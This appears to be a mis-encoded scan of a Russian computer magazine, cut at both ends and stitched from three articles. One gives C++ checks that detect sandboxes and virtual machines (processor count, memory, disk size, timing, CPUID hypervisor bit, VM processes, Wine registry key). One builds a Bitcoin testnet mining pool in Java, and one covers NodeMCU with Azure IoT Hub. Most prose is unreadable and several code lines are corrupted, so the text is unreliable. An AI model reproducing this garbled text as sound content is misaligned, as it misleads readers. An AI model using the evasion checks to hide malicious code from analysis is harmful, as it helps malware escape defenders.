牋牋牋爀lse爎eturn燜ALSE;
}
?�???�??�???�?�????�??�??????�??�???�?�??�???�????�?�??�??�,
????� ?� ????????� ???????� ???�???� ??� ????� ??????�????� ???�???�?� ????,
????�?� ?????,� ???,� ???�??� ???�?,� ?????�????� ????� ???� ???�???�??� ???�??
???�???�??�??�??�?.
PEB�->燦UMBEROFPROCESSORS
???�???�??�??� ???�?� ???�?� ???�???� ???�?� ???�??�????,� ???�?� ??� ??????
???� ?????�?� ?????�??�?.� ???�????,� ?????�???� ?????� ???�???�???� ?????�
????�??� ???�??�??.� ??� ??� ???�?� 2018� ???,� ?� ????� ?� ??????�??� ???�????
?????�??�??�?��?????�?�???�?,�??�??�??�?�????�??�?????,�????�?
????�??�??�???�????�???�???�????.�???�???�??�?�???,�?�??�????
???�????�????.
???�??�???�??�???爔64:
PULONG爌rocNum��(PULONG)(__readgsqword(0x60)�+�B8);牋�//燚WORD�
NumberOfProcessors;
???爔86:
PULONG爌rocNum��(PULONG)(__readfsdword(0x30)�+�64);牋�//燚WORD�
NumberOfProcessors;
????� ???� ??????�?� ?????�????� ????� NumberOfProcessors� ??� PEB� (Process
Environment燘lock).�?????�??�?�??�?????�??�?�??�??�????:
if�(*procNum��牋std::cout�<�"NumberOfProcessors�=�爉ay燽e�
sandboxed!\n";
????????�?????�??????????�?????
???�??� ?????�??� ????�??� ???�???�????� ?� ???� ?????� ???????�??� ???�?????�
???�?????.��???�??�??�?�??�?�??�???�?��????????�?�??????�???
???�????�?,� ??????� ???� ???�??� ???�???�??� ???�?� ???� ????�??�??.� ???
???�????�??�?????�????�????�??�??�?.
BOOL燾heck_memory()
{
牋燤EMORYSTATUSEX爉em_stat�爗�;牋牋
牋爏tatex.dwLength�爏izeof(mem_stat);
牋燝lobalMemoryStatusEx(&mem_stat);
牋爄f(mem_stat.ullTotalPhys��(1024LL�*�(1024LL�*�(1024LL�*�L))))�
return燭RUE;
牋爀lse爎eturn燜ALSE;
}
?????????�????????�????
??�?�??�?�?�??�???�??�??�??�????,��???�?�??�?????�??�????�?,
??�???�???�??????�???,�??�??�??�??�??�???�??�????�???.��???�???�
????� ??� ????�?????�?,� ???� ????�????� ??????�?� ?� ???�????,� ????� ???�????
????�?��????.
BOOL燾heck_freespace()
{
牋燣PCWSTR爈pDirectoryName�燦ULL;
牋燯LARGE_INTEGER爈pTotalNumberOfBytes;
牋燘OOL燽Stat�燝etDiskFreeSpaceEx(lpDirectoryName,燦ULL,�&lpTota
lNumberOfBytes,燦ULL);
牋爄f�(bStat)�
牋爗
牋牋牋爄f�(lpTotalNumberOfBytes.QuadPart��(30ULL�*�(1024ULL�*�(
1024ULL�*�(1024ULL)))))
牋牋牋牋牋爎eturn燭RUE;
牋牋牋爀lse爎eturn燜ALSE;
牋爙
}
???????�??????-?????
??�??�???� ?????�??� ????�?� ???�???�???�?� ?� ?????�??� ?� ?????�?� ????�?
?????�???� ??????� ????�????.� ??� ?????� ??????�?????� ???�???????�?
???� ????,� ???�?� ??????,� ??????�???�?� ???�????� ???�???�????� ???� ???.� ????
??�???�????��????�???�???????????�??�?????�????,�??????�?�??�??
???�???� ?????� ????????� ?????�???�?,� ?� ?� ???�???�???� ???�?� ?????�??
?????� ????�???� ?????�???.� ????� ???�???� ??????,� ??� ???�?� ????�???????,
???� ??????�???�?� ?????�???.� ??� ?????� ????� ?????�?,� ???�????,� ?????�???
Sandboxie.
BOOL燾heckTiming1()
{
牋爑nsigned燺_int64燾ounter1,燾ounter2,燾ounter3;
牋爄nt爄��
牋燿o
牋爗
牋牋牋燾ounter1�燺_rdtsc();
牋牋牋燝etProcessHeap();
牋牋牋燾ounter2�燺_rdtsc();
牋牋牋燙loseHandle(0);
牋牋牋燾ounter3�燺_rdtsc();
牋牋牋�//�???????�????????�??????�?????????燙loseHandle�燝etPro
cessHeap()
牋牋牋爄f�(�(燣ODWORD(counter3)�燣ODWORD(counter2)�)�/�
牋牋牋牋牋�(燣ODWORD(counter2)�燣ODWORD(counter1)�)�=�)
牋牋牋牋牋爎eturn燭RUE;
牋爙爓hile�(i��爄��;爄++);
牋爎eturn燜ALSE;
}
??�??????�??�???�????�????�??�???� CloseHandle�� GetProcessHeap()
???�??�???�??�?��.�???�???�????�???�?,�???�?�????��??????
????�??�??�??????��???�???�????�???.
???�?� ?????�???� ?????� ????�???�?????� ???????� ???�???� ?� ???�????,
????�???�???� ??????� ???�???� Sleep().� ????� ???�???� ??????� ???�???
?????�????�?�?????燬leep()��??�?,�?�?�??�??�??.
BOOL燾heck_sleep()
{
牋�//�?????????????�?????�????
牋燚WORD燾ounterStart��
牋燚WORD燾ounterEnd��
牋燚WORD燿ifference��
牋燾ounterStart�燝etTickCount();牋//�???????�????�?�?????�
Sleep();
牋燬leep(100000);�//�???????�?�0�?????
牋燾ounterEnd�燝etTickCount();牋//�????????�????�????�?????
牋燿ifference�燾ounterEnd�燾ounterStart;牋//�?????????�????????�
?????????
牋爄f燿ifference��000)�//�???????????�?�???�??????,�???????�
???????????
牋牋牋爎eturn燜ALSE;
牋爀lse牋牋return燭RUE;
}
???????�?????�???????????
??�??�???�???�????�?????�??�????�???��???�??�???�???�??????????�
???,� ??� ????�?� ??� ????�?????� ?????�?????� ?????� ???� ???????� ???�???�??
__cpuid.�??�??�?????�?��??�??�???�??�??��??�???,�??????�?�???�
?????�???.�?�?????�?�?????�?�????�?????�????�???� cpuInfo,�??????
???�???� ??� ???????� ?????,� ??????�?????� ?� ?????�???� ???�??�???� EAX,� EBX,
ECX� ?� EDX.� ??� ????� ???�?� ??????� ???�??� ?????�???� cpuInfo� ?� ???�?� func?
tion_id,�??????�??????�????�?,�????�???�?�??????�??�??�???�????�
??.�??�???�??�????�???�??爔64?,�??�爔86?????�??�???.�?�??�????�???�
?????�??�?????�???�??:
void __cpuid(
    int cpuInfo[4],
    int function_id
);
??�?�???????�??�?��???� function_id��??�??????,�??�?????�?�??
???��????�??燛CX�????�???� cpuInfo,�?�??�?�?????��??�???�???�?????�
??????.�???,�??:
BOOL check_cpuid()
{
    INT cpuInfo[4] = { -1 };  // array that receives EAX, EBX, ECX and EDX
    __cpuid(cpuInfo, 1);      // query CPUID leaf 1
    if ((cpuInfo[2] >> 31) & 1)
        return TRUE;          // bit 31 of ECX (cpuInfo[2]) is set: a hypervisor is present
    return FALSE;
}
??�???� ???�?,� ?????�???� ?????�?????� ?????�???�???� ???� ??,� ???� ?� ??????�
????:�??�?�???�?�??�??????�?�??�??�?�??�????�?????�?????��????�
???.� ?????� ???�???�?� ???????�???� ?????�????� Virtual� PC� ???� ??????� ????�
????,� ???????� ??� ??????�?� ????,� ?� DWORD� getPIDproc(char� *�
pProcName).� ????�?� ??????�??� ?� ???� ???� ???�??� ???�??�??,� ?????�?????
???燰irtual燩C:
if(getPIDproc("VMSrvc.exe") || getPIDproc("VMUSrvc.exe")) std::cout << "Virtual PC detected!\n";
???�?�??�?�??�??�????�????燙itrix燲en:
if(getPIDproc("xenservice.exe")) std::cout << "Citrix Xen detected!\n";
??�???� ???�?????,� ???� ???????�???� ?????�?????� ??� ?????�?????� ???????
?� ????�??.� ???� ???�?� ???????� ??????�??� ???�???,� ???????� ???????� ???
????�?????,�??�???�????�??????�???�???�?燱ine.
BOOL check_wine_registry_key()
{
    HKEY phkResult = NULL;
    // The key exists only when the process runs under Wine
    if (RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\\Wine"), 0, KEY_READ, &phkResult) == ERROR_SUCCESS)
    {
        RegCloseKey(phkResult);
        return TRUE;
    }
    return FALSE;
}
??????????
???� ??� ?� ?????�???,� ???� ????�?????� ?????�???� ???�???�??�??� ???�?� ????�
????� ???�???�?.� ???� ??� ???� ??� ???�?????� ???????,� ??� ??� ??????� ??????
??????�??�??�?�????�??????�???�?,�???�??�???�???�?????�???�???�??
(?�??�????,��???�?)�??�???�????.
??????
MINING
POOL ??燡AVA
gogaworm
?????�??????�?????
???????牜?????�
gogaworm@tut.by
?????�?????????????
??????????????
??�????� ???�?� Bitcoin� ???�???� ?� ????,� ???� ????� ?� ?????
?????�??� ????�?� ?� ???????� ????�??�??�???� ???�???� ???�?
???�?????�?� ?????� ?????�?.� ???� ????�???� ??????� ????�????�
???�???�???????�??�?�???�??�???�??�??�?�???�?????
?� ???�????� ?????� ?????�??�?� ?,� ???� ???�???,� ??????�???
?�??�??�????�??�????�???�?.
????????�?????��??????�?????????????
?�????�??�???�?????�?�?�??�???�??�??�?��????�?�??????�??�????�
??� ?� ????�?????�?� ???????� ???????�????.� ???� ???� ???�????????� ??� ???�?
???�??�???�??�???�??�???�?�??�??,�??�?��??�???????,�??�?????�???�
??� ?????�??� ???�??�???�??� ?� ???�???� ????�?� ????.� ?� ???????,� ????� ???????
???????� ?� ?????� ????�???� Bitcoin� Core.� ???�??�???�??� ?� ?????� ?????
??????�?� ?????� ???�?� ???�???� ?� ???�?� ??� ???�?,� ?????�?� ???� ??????� ????�
?????�?��??�?????�??�??�?�?????�?????�??�????�???� testnet,�??????
????�??�??�?� ???�???� ??� ???????�??� ?� ????�????�?.� ?????�???� UI?????�
????�??� Bitcoin� Core� (testnet)� ?� ????,� ????� ?????�????� ???�??�???�??.
?� ????�?????� ???� ??????� ?????� ????�?????�?� ???�???�??� ???�????
bitcoind.
???� ????�??� ?� bitcoind� ??????�???�?� ???�????� JSON?RPC.� ???� ?????
????�??� ???�????� ??????� HTTP,� ???�???�???� ????????� ??????� ???�???,
??????�??燡SON,�??�?�???????�??�?????��??????�?.
??�???�????��????�??????�????�??�???????�??�??�????�燽itcoind
?????�???.� ???�?� ??� ????�???,� ???�?� ???�???� ????� bitcoin.conf� ?� ??????�?
Windows:� %APPDATA%\Bitcoin\� (???�????,� C:\Users\username\AppData\
Roaming\Bitcoin\bitcoin.conf)� ???� Linux:� $HOME/.bitcoin/� (???�????,� /
home/username/.bitcoin/bitcoin.conf).� ???????� ????� ???�?� ?????
?燝itHub.�??????��??��????�???�?�??�?????�??????�?:
#�??????�??????�???????????�???????�???,��?�????????
testnet=1�
#�??�???????????��?????,�??????�?,�????�???????�?�??????
rpcuser=rpcuser
rpcpassword=rpcpassword
???�?�??�?????�??�???�?,�??�?�??�???�?????�?�??????�??�????� bit?
coin?cli.� ???�????,� ?????�??� ?????�?� getinfo� (????�???????�?� ?????�??
bitcoind).�??�?????�??�????�???�?????�??�?�??�??????�??.
???燡SON?RPC????�??�??????,�?????�??�???�????燰ert.x,�?????�??�?
????�??,� ???� ??????�?� ????� ???�?� ?� ?� ???� ?????�???�?� ???� ????�??????
???�??�???.
????,�??�???燞TTP????�??.燘itcoind�?????�???�??????�????�?????�??,
?????�?�??�????�???�燘ase64�???�?��??????��??????.
client = vertx.createHttpClient();
requestOptions = new RequestOptions()
        .setHost(host)
        .setPort(port)
        .setURI("/");
base64Key = Base64.getEncoder().encodeToString((user + ':' + password).getBytes());
??�??�???�??�????�??�?????�??????燽itcoind.�????�?????�???��???
?????�?�燡SON????�???�爃andler,�??�?�????�?????�?�??????�??�????
??�??�???.
private void executeRpc(String command, final Handler<Buffer> handler) {
    client
        .post(requestOptions, result -> {
            if (result.statusCode() == 200) {
                result.bodyHandler(handler);
            } else {
                System.out.println("Failed do post because " + result.statusMessage());
            }
        })
        .putHeader(HttpHeaders.CONTENT_TYPE, "application/json")
        .putHeader(HttpHeaders.AUTHORIZATION, "Basic " + base64Key)
        .putHeader(HttpHeaders.CONTENT_LENGTH, String.valueOf(command.length()))
        .write(command)
        .end();
}
??�?????� ?????�?,� ???????� ???� ??????�??�?,� ?� ???� ????????� ??????
?�????�???�?????.�?�???�?�??�???�?????��?�????�????,�??�???�??
???�?????�??�???�??�??�?.�??�????�??,�??�???�?????�???�?�????�?
???�??,��??????�??�??�?�??????�??�??�???�???�????�?.�??�??�???
???�???�?�??????�?��???�?�???�?????.�?????�??�???��???????�??
???????�?�??�?,�??�????�?????�?�???�?�????�???.�?�??�?�??�??????�
????�?�?????�??�??�??�???�??????.
??�???�??�??�???�?�??�???�??�????:
? ???�??�(????�???�?�??�??�?????�??�??�?),
? ???�??????�?�??�???�???�??�?,
? ??�???�??�??�(???�???�???�?????,�???�??�??��???),
? ???�?�??�????�??�?,
? bits� (??????�????�??� ???�??� ?????�???� ???�?????�???� ???�????� ????
???�?),
? nonce�(???�?????�??�??�????).
???�?????�?�??????�?
???�??�??????�??�??�???�?�???????�????�?爂etblocktemplate.
executeRpc(new JsonObject(ImmutableMap.of(
        "id", "1",
        "method", "getblocktemplate",
        "params", "",
        "jsonrpc", "1.0")).toString(), buffer -> {
    createJobData(buffer.toJsonObject());
});
?�?????�???�??????燡SON????�??.
{
�"result":爗
牋�"version":�??????�????>,
牋�"previousblockhash":�"<???�??????????�????>",
牋�"transactions":燵�??????????,�??????�????�???????��???>
牋牋爗
牋牋牋�"data":�"<??????�?????????>",
牋牋牋�"hash":�"<???�?????????,�??????�??????????�??�?????????�
?????�?????>",
牋牋牋�"fee":�???????��????????�????�??????��???????>,
牋牋牋�...
牋牋爙
牋牋�...
牋燷,
牋�"coinbaseaux":爗�??????,�??????�????�???????��?????�
??????????�????????�????�????>
牋牋�"flags":�""
牋爙,
牋�"coinbasevalue":�????????????�??????�?�??????�????�????>,
牋�"target":�"<???????�???????�??�???�????>",
牋�"mintime":�???????????�????????�????�???????�????>,
牋�"mutable":燵�??????????�???>
牋牋�"time",
牋牋�"transactions",
牋牋�"prevblock"
牋燷,
牋�"noncerange":�"<??????????�???????爊once>",
牋�"curtime":�?????�???????�????>,
牋�"bits":�"<???????????�???????爐arget>",
牋�"height":�??????�???????�????>
爙,
�"error":爊ull,
�"id":�"1"
}
???�?� ??????�?� ???�???� ???�????� ????� ???????�?,� ???�??� ?????� ??????
nonce� ?� ???�?� ???�????� ???�?� (?� ????�????�??� ?????�???).� ???�???????
nonce��???�???�??�?�???�????�??�???�??�????�??�?�??�????��????�
?????�???� ?????�???� ??????�?� ???�?????� ???�????.� ???�?� ???� ???�?????,
???�??�????�?�??�???????�???�????�???�?????,��?????�???�???�????�
????� ??????� ???�??,� ???�???�??� ???� ?????� ????�???� ??????�?.� ??????
????� ?� ???�??�?????� ??????� ???�?� ???�?????� ?????� ????�??,� ???�?� ??
??????�?�??�?????�???.
???�??�???�????�?��??�?�???�?�???�??�?????�???燾oinbase??????�
??????,�??????�???�???�?�?????�??�????�????.�??�???�???�?�?�????�
???�???�?????�??,�??�?�??�?�??�?,�??�???�??�?,�???�?�???�?�????�
??.�??�?�???,��??�??�???�?????�???�???爏criptPubKey�爏criptSig.��??
?????�????� ??????�??� ????�????� ??� ???�?� Script,� ???????� ????�???
??�?????�??�???�?????.�??�?�???�?????�??�?????�????�??,�?????�???
???�???� scriptSig� ??� ???�??� ????�?????,� ?� ?????� scriptPubKey� ??� ?????� ?????�
??????.� ????� ?????�????� ???????,� ??� ????�?????� ???�???�?� ?????�??.� ???
???�燾oinbase?????�?????�??�??�????�???�?????,�?�???爏criptSig�??????�
????燾oinbase���???�??�?�?????�????�??????�??.�???��???�???�?
????,�??�?�??�?????�????�??�?????�?????�??�????.
???�????�????燾oinbase?????�?????
???�????�???� Bitcoin� ???�???� ???????�???� ?� ????�???�???�?� ???�??� ?� ??
???�??,� ??� ????????� ???????� ???�??,� ?????�?,� ???�?� ??� ???�?� ?� ???,� ????�
????�???�?�??�?????�??燾oinbase?????�?????燡ava????�????�??燽itcoinj.
TestNet3Params params = TestNet3Params.get(); // parameters of the test network
byte[] pubKeyTo = (new ECKey()).getPubKey(); // freshly generated key pair; the coinbase output pays to its public key
Coin coin = Coin.valueOf(blocktemplate.getJsonObject("result").getLong("coinbasevalue"));
int height = blocktemplate.getJsonObject("result").getInteger("height");
String coinbaseauxFlags = blocktemplate.getJsonObject("result").getJsonObject("coinbaseaux").getString("flags");
byte[] extranonce = new byte[8];
String message = "Troyanpool Rulez!";
byte[] coinbase = generateCoinbaseTransaction(params, height, coinbaseauxFlags, extranonce, message, pubKeyTo, coin).bitcoinSerialize();

private Transaction generateCoinbaseTransaction(NetworkParameters params, int height, String coinbaseauxFlags, byte[] extranonce, String message, byte[] pubKeyTo, Coin value) {
    Transaction coinbase = new Transaction(params);
    ScriptBuilder inputBuilder = new ScriptBuilder();
    // The input script starts with the block height
    inputBuilder.number((long) height);
    byte[] coinbseauxFlagsData = isNotEmpty(coinbaseauxFlags) ? HEX.decode(coinbaseauxFlags) : new byte[0];
    byte[] messageData = message.getBytes();
    // Arbitrary coinbase data: flags, then extranonce, then the pool message
    byte[] data = new byte[coinbseauxFlagsData.length + extranonce.length + messageData.length];
    if (coinbseauxFlagsData.length > 0) {
        System.arraycopy(coinbseauxFlagsData, 0, data, 0, coinbseauxFlagsData.length);
    }
    System.arraycopy(extranonce, 0, data, coinbseauxFlagsData.length, extranonce.length);
    System.arraycopy(messageData, 0, data, coinbseauxFlagsData.length + extranonce.length, messageData.length);
    inputBuilder.data(data);
    coinbase.addInput(new TransactionInput(params, coinbase, inputBuilder.build().getProgram()));
    coinbase.addOutput(new TransactionOutput(params, coinbase, value, ScriptBuilder.createOutputScript(ECKey.fromPublicOnly(pubKeyTo)).getProgram()));
    return coinbase;
}
???� ?????�??� ???�????� (???�?� ??� ???�??� ???� ??� ??????� ?????�????)� ????�
?????燾oinbase?????�?????�?�??�??�?:燾oinbase1,爀xtranonce,燾oinbase2.
??�?????� ????�?????� ?????� ???�?� ?� ???�?????.� ???� ???�?� ???�???�???�?
???�???�??� Stratum.� ??� ??????�???� ??� TCP/IP????????,� ?????� ???????� ?????�
????� ???�??� ?� ???�???� JSON.� ???�????� ????�??�??� ?????�????� ?� ????�
??????.
vertx.createNetServer().connectHandler(netSocket -> {
    // Each incoming message ends with a newline character
    RecordParser parser = RecordParser.newDelimited("\n", netSocket);
    parser
            .endHandler(v -> netSocket.close())
            .exceptionHandler(throwable -> {
                throwable.printStackTrace();
                netSocket.close();
            })
            .handler(buffer -> {
                String inputCommand = buffer.toString("UTF-8");
                processCommand(new JsonObject(inputCommand));
            });
}).listen(33333);
???�????�??�???�???�???�??�??�????,��??�??�???�??�???�?�??�??
????� ?� ?????� ??� ?????� ???????�??�?????�?,� ???�?� ?????� ??????�?????,
??????� ??� ????� ??????� ?� ????????� ???� ???�???,� ????� ?????�???� ??� ??????�
???�?�???��??�???�???�??�?.�??�?????��??�???�?燬tratum�??�?� ???�
??????� ???.� ???�?� ?????�??????�?� ???�??�?????� ???�???�??� ?????� ??????
???�???�??�???,�??�????爀xtranonce�?�??�??�?���??�??�????�????�
???????�???�??�??�????,��??�??�??�????�???�???.
// Register the new miner and give it its own extranonce1
Miner miner = new Miner(netSocket);
miner.setExtranonce1(minerCounter++);
??�????�??� ??� extranonce� ?� ???�???�??� ????�?????�??� ???�????� ???????�
????�??�???��????�?�????�?爉ining.subscribe:
if (command.getString("method").equalsIgnoreCase("mining.subscribe"))
{
    String answer = "{\"jsonrpc\":\"2.0\",\"result\":[[\"mining.notify\",\"" + subscriptionId + "\"],\""
        + extraNonce1 + "\"," + extraNonce2.length + "],\"id\":1}";
????�???�?�??????�??�??�???.
{
"params":�
燵"<?????????????�??????>",�
�"<???�??????????�????>",�
�"<coinbase1>",�
�"<coinbase2>",�
燵"<???�?????????�",�...�"<???�?????????�>"],�
�"<??????>",�
�"<bits>",�
�"<?????�???????�????>",�
�????爐rue,�?�?????????�????????????�?�????�?????>],�
�"id":�"1",�"method":�"mining.notify"
}
???�?� ???�??� ???�??� ???????,� ??� ????�??� ???�??� ?????� extranonce,� ???�?
???�????� ???�?� ?� nonce.� ????� ????�?????� ???�???� ?????� ????� ?� ?????�???
???�燽itcoin?????.
TestNet3Params爌arams�燭estNet3Params.get();�//�?????????�???????�
????
//�?�???????�???????燾oinbase???????????
transactions.add(generateCoinbaseTransaction(params,爃eight,爀xtran
once,爉essage,爌ubKeyTo,燾oin));
Block燽lock�爊ew燘lock(params,燽lockVersion,爌revBlockHash,爉erkel
Root,爊time,燿ifficulty,爊once,爐ransactions);
byte[]燽lockBytes�燽lock.bitcoinSerialize();
executeRpc(new燡sonObject(ImmutableMap.of(
牋牋牋�"id",�"1",
牋牋牋�"method",�"submitblock",
牋牋牋�"params",燞EX.encode(blockBytes),
牋牋牋�"jsonrpc",�"1.0")).toString(),燽uffer�>爗
牋燡sonObject爎esult�燽uffer.toJsonObject();
牋爄f�(result.getString("result")�=爊ull)爗
牋牋牋燬ystem.out.println("????�??????�???????!");
牋爙
});
???�?� ????� ???????� ?????�??,� ???�?� ???�?????� ????� ???�????� ??� ????�?
??????�??�???�??�??.�??�??�?�?????�???�???�??????.
// Forward every job notification to all connected miners
vertx.eventBus().consumer("miner.notify", message -> {
    for (Miner miner : miners) {
        miner.getSocket().write(message.body().toString());
    }
});
...
// Publish a new job to everyone subscribed to the address
vertx.eventBus().publish("miner.notify", jobNotification);
?????!
???� ???�??� ?????�??.� ????�???� ????????� ????�??�?� ???�??,� ?� ???�?
????????� ???�???.� ????�?� ???�?,� ???� ???� ???� ???�??�?� ???�???� ??????�?
??????��?????�?�??�?�??�?�?�??�?.��?�?????�??�??�??????�?�???
????�???�???� ???�??,� ???????� ???�?????�?� ???�????�?� ????� ??????� ?� ????�
???�?�???�?????�?,�???�?�?�?????�?????�??�?�???�????�)
??????
??????
?�?????
???????�?????
asommer@yandex.ru
??????�????????�??????
???�????????�????
??燦ODEMCU�+燗ZURE營OT燞UB
??�??� ???????�??� ???�??????� IoT???????�??� ?� ???� ????
???????�??.� ??� ?????�?????� ????� ????� ??� ????????� IoT?
???�???� ???�?????� ???�???�?� ??� ????�?� ???�???� ?� ?????,
???????,� ???�?????,� ??� ???�?� ??????� ????� ????�?� ????
?????�????�?.� :)� ?� ????� ??????� ?� ???�??�?,� ???� ?????�???
???�??� ?� ????�?� ?� ???�?� NodeMCU,� ??????�??� ????� Lua.
???�??�????�???????�??�?��?????�????燗zure燜unctions
?燭able燬torage,�?�??燩oC�??燦odeMCU��??�?燣ua�??�?
??????�?????� ?� ?� ???�???� ???�??�?????� ????????� IoT?
???????.
INFO
NodeMCU� ??� Expressif� ?� ???� ????� ??� ?????
??????�??� ????� ?� Wi?Fi,� microUSB� ?� ????�?????�
?????�?�??�?.�??�??�???�?�???�?????燛S?
P8266.� ???�?� ???�???� ??????�??� ???�?� ????�
???????�???�???????�?�?�7�??�????.��???�
???� ???�?� ????????� ??� Arduino� IDE.� ???�?� ????,
???�?� ???�????�???� ?????�????� ????� Lua
(??????�??�?��??�?????�??�?�??牜????�).
???????????��????????�??????
???� ????� ???�?� ???� Windows� ??????� ???�?????�?,� ???�?� ???�???� ????�??
??�??�?????�???�?:燙P210x燯SB爐o燯ART燘ridge燰CP燚rivers.
????�??�???� ???�????� ???�?????�???�???� ???�?� NodeMCU� ?
???�5�0�??/?.�?�?????�???�?????�??�??�??�????,�?�??�??�??�?
????�?� ??????�???� ???� ???�????� ?� 115� 200.� ???�?,� ???�?� ????�???� ????
????�??�???�??�?�????�?�??�????.
????�???�???�???
????????
???�??�??�?,��??�???????�??�??�??�?�??????�????�?�??�???,�????�?
?�??�??�??�?�??�???�?????�???�????�??????�?.�??�???�????燜irmware
???�?� ???�???�???� ???�???�?:� ?� ???????� ??�????�?� ???�???,� ??�???
Docker??�??�?????�??�??�???�??�??燣inux.
?�??????��??????�??????�?�??�???,�??��???�??????.�)
??�?� ???�?� ?????�???� ???�??� ?� ????�?,� ??� ??????�??�?� ???�???� SNTP,
MQTT,� HTTP� (Wi?Fi,� timer,� ?le,� GPIO,� net,� node,� UART� ???� ???�???� ??� ?????�
?????).� ???�?� ???�???� ????????� ?� ?????�??� ????�?????�?� TLS/SSL� support
?�??�??燤iscellaneous爋ptions.�???�?�燽in????�??�??�????�?�??�?.�???�
???� ???�???,� ???�????� ????� ???�?� ???� ????�?.� ????� ?� ????�??,� ???�?????�
??????�??�????��??�?????�??????,��??�??��?�??�????�?????.
??�??� ???�??�??� ESP8266� ????�?????� ???�??�?� ?� ???�??� ?????.
??� ???�?� ???�???� ??????�??� ????�?� FLASH.� ??� ???????� ??� ???�?� ????�????
???????�??�??????爎eset�?????�??�?????��????燽ootloader.�???�????
?� ???�?� ??????�????� ???�?� ?????� ????�?� ???,� ??� ?????� ???�??�??� ???�?
?????�???� GPIO0� ?� GND� ?� ??????� reset� (????� ???�??� ???�????� ???� ESP?12).
???�???燜irmware�??�?�??�????燩yFlasher.燩y��??�????�???�???,�??�???�
????�??� ??????�?� ??� Python.� ????� ???� nodemcu??asher,� ??� ???� ???�?� ???
??�??????�???.�?��?�??�????.
??�?燩yFlasher�??�????�??:
PyFlasher
Flash爉ode�?????�???��?????�??�?�?�???,�????��??�??�?.�???�????�
???� ???�????�??� ????� ??� ????� ???????� ESP8266� ESP?12� ?� ESP32� ???�????
?????燚IO,燛SP8266�?��?���????�??�???�????燪IO.燚OUT�??????�
????�?燛SP8285.
?????????營DE
???�???�?�??�???�??營DE�?�???�?� ESPlorer.��????�??�??�??�?????�???
ZeroBrane� Studio.� ???� ????�?� ???�?� ??� ????� ???�??�?� ESPlorer,� ?????�?
???�???�??�??�?????�???�?��??.
ESPlorer�??????�?燡AVA.�????????�??�???�??�????.
ESPlorer
?�????�??�???�??,�??�???�?��????�??.��??�??��???�?????�??�?
?� ?????�?� ???????�??� ?????�??.� ?????�???� ???�???�??,� ??????�?� ????.
????�??�???�?� ???�????,� ??� ???????� ?????� ???�???�???� ?????� (????�????
???�?,�??�5�0),��?????�?燨pen.
??�????�?�??�??�?�??�?�燛SPlorer
???�??�????�??�?�????�???�???�??�?????,�??????�???�?�????�????
???�???�???:
LED��gpio.mode(LED,爂pio.OUTPUT)
function爁lash_led()
gpio.write(LED,爂pio.LOW)
tmr.delay(500000)牋牋牋�
gpio.write(LED,爂pio.HIGH)
end
tmr.alarm(1,�00,爐mr.ALARM_AUTO,爁lash_led)
??�?�?�????�??�?�??�????�???�?�??�???�??�(???�???�??�??�??�????�
???� ???�???� ???�????� ???�???�???),� ??� ???�?� ???�???????� ?????�???
???�????�???�??�?????,�??????�??????�?�????�???�?:
print("Hello from Lua!")
???�?� ????� ???� ???�???� ????� ???�???� .lua� (?????�??,� test.lua),� ???�???
?� ????� ???� ?� ???�?????� ??� ????,� ???�?� ?????� ???�?????� ???� ??� ??????�???.
???� ???�?� ????�?????� ???????� ????,� ????� ??� ??� ??????� (????�?� Open),
?�?????�???�?燯pload.�?�??�?�??�?�??�?�??�??,�??????�??�?????�?
???�????�(???�?).
???�????�???,�????�??�??,�????�??�????�?
dofile("test.lua")
??�??�?� ???�?� ????�?� ????�??� ?� ???�??� ????,� ???�??????�??� ????�?
???� ??????�??.� ???�?� ???????,� ?� ???�??� ?� ????�????�??� ????�?????�?
?????� ??????� ????�?� Reload� (????�??� ???� ???�??� ????�?).� ??????�?� ???�??
???�??� ?� ???�????�???� ??� ???�?� ???�???� .lua.� ???????� ??� ????�?� ?� ???�??
???�?�????�??�???�?�??????�??.
??�?�?????,�??�?�???�????�????�??�?�??�?�???�????�??�?,�?�???�
???�???��??�??燗UTOEXEC.BA?�???,�?�???爄nit.lua.�)
?????????�???????�????�??�?????��??????????
??�????�?�???????�??�?�???�?????�???��??�????�??�???�??��????�
??.� ?� ?????�??� ???� ????�??� ??????�???� ???�?� ???�???� ???�?� ??� ???�???
Azure,�??�???�????�???�?????�??�?????�???.��???�?�??�??�?營oT?????
???�??�???�?燛xplorers�???�?????�??�???營oT燚evices��?????�+燗dd.
???� ???�??�????� ??????�???� ?� IoT?????� ???� ????�?????� ???�???�?????
SAS� (shared� access� signature).� ???� ??????�??� SAS� ??????�???�?� ????� ?????�
????� ??????�???,� ???????� ???�?� ????????� ?� ???????� ????�???�???�??� ????�
????�(Device燛xplorer,爄othub?explorer,營oT燛xtension爁or燗zure燙LI�0).�?�??�?
???�?� ????????� ????� ???� ???� ??,� ??� ???�???� Azure,� ???�?� ?� IoT� Hub� ?� IoT
Devices.
IoT燛xplorer
SAS� ???�?� ???�???�?????� ??� ??????�???,� ?� ???�?� ?� ???????� ???�??
??????????�???.� ?� ????�???,� SDK� ?????� ???�???�?????� SAS� ????�???�??�?
(???�????�?��???�??�???�???�???�???�?????�???).
???�????�?????��??????�??�???
???�??,� ???� ???????� SAS??????� ??????�???�?� ???????�????� ??� ????�?????�
???� ???�?,� ????� ?????� ??????�??.� ????� ?????�??�?� ?� ????�????�??� ?????.
????� ??????�???� ???�???� ????�?� ???� ??????�???,� ??� ???�???�?????� ?????
??????�??�???�???????�????�????????�??�???�?????�???.�????�?,�???�
??� ???�???� ???�???�???� ???�???,� ????�????� ?????� ???????:� ???�????
??� ??????�???� ???� Azure????�?� ????�???� ??????�???.� ?� ?� ????� ???�???
?????� ??????�???� SAS� ???�????,� ???�???�?� ??� ???� ?� ?????� ???�?� ???????�
????.�????�???�??,�???????燬AS�??�?�????,�???�?�???�??�?????�???
?�??�??�??�?.
???�??� ???�??,� ???� ???????� SAS� ??????�???�?� ??� ??????�???,� ?????
????�??� ?� ????�??,� ??� ????� ?????� ???????�??,� ???� ???,� ???????� ???�??
?� ??????�???,� ???�???�?????� ???�??� ??????� ????� ?� ??????�?????� SAS
??????�???� ?????�??????�?.� ??� ???�??� ???�??� ?????�??� ???�??� ????????
????�?燬AS�?????,�??�?�??�?�??????�???�???�?.
??�????,� ???� ???� ???�???� ??� ????�???� ???�?� ????????�?,� ????� ?� ??????
????� ???�??� ?� ??????�???.� ????� ??????� ?????�????� ?� ???????� VPN� ?????
??� ???????.� ?� ?????� ???�??� ?????� ??????�?� ?????� ???????,� ??� ???,� ????
???????��???�?????�???,�??�??�???????��??�??��?????.��?????�??,
